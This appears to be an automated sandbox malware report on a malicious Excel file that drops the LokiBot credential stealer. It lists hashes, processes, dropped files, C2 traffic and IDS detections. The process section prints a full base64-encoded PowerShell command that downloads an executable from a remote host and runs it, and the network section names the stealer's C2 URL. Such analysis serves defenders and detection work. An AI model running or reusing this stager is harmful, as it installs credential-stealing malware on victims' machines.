File name: | 2110375802.xls |
Full analysis: | https://app.any.run/tasks/28cb14ca-b5e1-4391-87e7-272618fa2a54 |
Verdict: | Malicious activity |
Threats: | LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals. |
Analysis date: | November 14, 2018, 10:39:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Nov 13 22:51:19 2018, Last Saved Time/Date: Tue Nov 13 22:51:21 2018, Security: 0 |
MD5: | 83DEAC16DB073345CA12C3F981E37BF3 |
SHA1: | DCC4E8FF81B14FFF6AB03C606D71F79827839B88 |
SHA256: | 60187E0A37AEF0C2B540D839402979DE34C5AA0E165B5C3B7F836808635DE02C |
SSDEEP: | 1536:tDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAdIEZxlv/umee+m0V25MikRGhjMhY/F:tDZ+RwPONXoRjDhIcp0fDlaGGx+cL26+ |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 38 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2018:11:13 22:51:21 |
CreateDate: | 2018:11:13 22:51:19 |
Software: | Microsoft Excel |
LastModifiedBy: | PC |
Author: | PC |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2844 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
4080 | cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZwBkAG0AVQA1AEMAUwBnAFIANQBFAHUANQA2ADkAMQBmADQAVAByAFMAOABsAHoAdwBFAF8AdAAgACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABHADIATwBtAGgAQQBsAEQAeQBHAFgAdwBwAGgAMQB3AGcAeABDAGkAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAFQAZgB4AEYATgBDAHcAUgB5AEoARQBDAG8AVAA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAYwA3AGsANQBVAEMAdABlAC4AZQB4AGUAJwA7AA0ACgBnAGQAbQBVADUAQwBTAGcAUgA1AEUAdQA1ADYAOQAxAGYANABUAHIAUwA4AGwAegB3AEUAXwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHUAcwByAHQAaQBqAC4AagBwAGcAJwAgACQASwBUAGYAeABGAE4AQwB3AFIAeQBKAEUAQwBvAFQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\system32\cMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
860 | PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZwBkAG0AVQA1AEMAUwBnAFIANQBFAHUANQA2ADkAMQBmADQAVAByAFMAOABsAHoAdwBFAF8AdAAgACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABHADIATwBtAGgAQQBsAEQAeQBHAFgAdwBwAGgAMQB3AGcAeABDAGkAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAFQAZgB4AEYATgBDAHcAUgB5AEoARQBDAG8AVAA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAYwA3AGsANQBVAEMAdABlAC4AZQB4AGUAJwA7AA0ACgBnAGQAbQBVADUAQwBTAGcAUgA1AEUAdQA1ADYAOQAxAGYANABUAHIAUwA4AGwAegB3AEUAXwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHUAcwByAHQAaQBqAC4AagBwAGcAJwAgACQASwBUAGYAeABGAE4AQwB3AFIAeQBKAEUAQwBvAFQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3308 | "C:\Users\admin\c7k5UCte.exe" | C:\Users\admin\c7k5UCte.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2376 | "C:\Windows\System32\mstsc.exe" | C:\Windows\System32\mstsc.exe | c7k5UCte.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Remote Desktop Connection Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2844 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR212F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1W33Q1J80OG2PJLOIJKW.temp | — | |
MD5:— | SHA256:— | |||
2376 | mstsc.exe | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck | — | |
MD5:— | SHA256:— | |||
860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18291e.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
2376 | mstsc.exe | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdb | text | |
MD5:5302B1B5EC232D44E2D9507FB847FC49 | SHA256:20B58A25872B1E3F7D47DAE0C090ACF229C49B6E33939934513499CC37BB2684 | |||
2376 | mstsc.exe | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe | executable | |
MD5:68B4A549D0B56A4DD9A488751037CF09 | SHA256:A9286688556DBB45303D3A0E7825294F58FFD48E125518AC33AB009426C967CC | |||
2844 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2110375802.xls.LNK | lnk | |
MD5:7611E5075B017DB880A07B77F8F64CB2 | SHA256:B8D92D9E05DFF6B74C1820A38566A1AA5DB1DDC37CE07C0E4E3B0C17A11F3BC5 | |||
860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
2844 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:60F3263ED112F0C5BDD237A659938246 | SHA256:F28F638EC8739DC16D6D2F704C3C8BB1CB848B69C464EB2A348FC02BAA85FA96 | |||
3308 | c7k5UCte.exe | C:\Users\admin\AppData\Local\Temp\Disk.sys | executable | |
MD5:AC6829C09D6E1FF82721D99F219B6CE2 | SHA256:3469E8BA7FAC62360F352CBD1D2876A898030428A6D012A94F64EDADA423BB74 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2376 | mstsc.exe | POST | — | 64.137.235.193:80 | http://jekone.igg.biz/hm/sgbbu2/cat.php | CA | — | — | malicious |
2376 | mstsc.exe | POST | — | 64.137.235.193:80 | http://jekone.igg.biz/hm/sgbbu2/cat.php | CA | — | — | malicious |
2376 | mstsc.exe | POST | — | 64.137.235.193:80 | http://jekone.igg.biz/hm/sgbbu2/cat.php | CA | — | — | malicious |
2376 | mstsc.exe | POST | — | 64.137.235.193:80 | http://jekone.igg.biz/hm/sgbbu2/cat.php | CA | — | — | malicious |
2376 | mstsc.exe | POST | — | 64.137.235.193:80 | http://jekone.igg.biz/hm/sgbbu2/cat.php | CA | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2376 | mstsc.exe | 64.137.235.193:80 | jekone.igg.biz | 2267921 ONTARIO LTD | CA | malicious |
860 | powershell.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe |
| unknown |
jekone.igg.biz |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |
2376 | mstsc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Loki Bot Check-in M2 |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
2376 | mstsc.exe | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |
2376 | mstsc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Loki Bot Check-in M2 |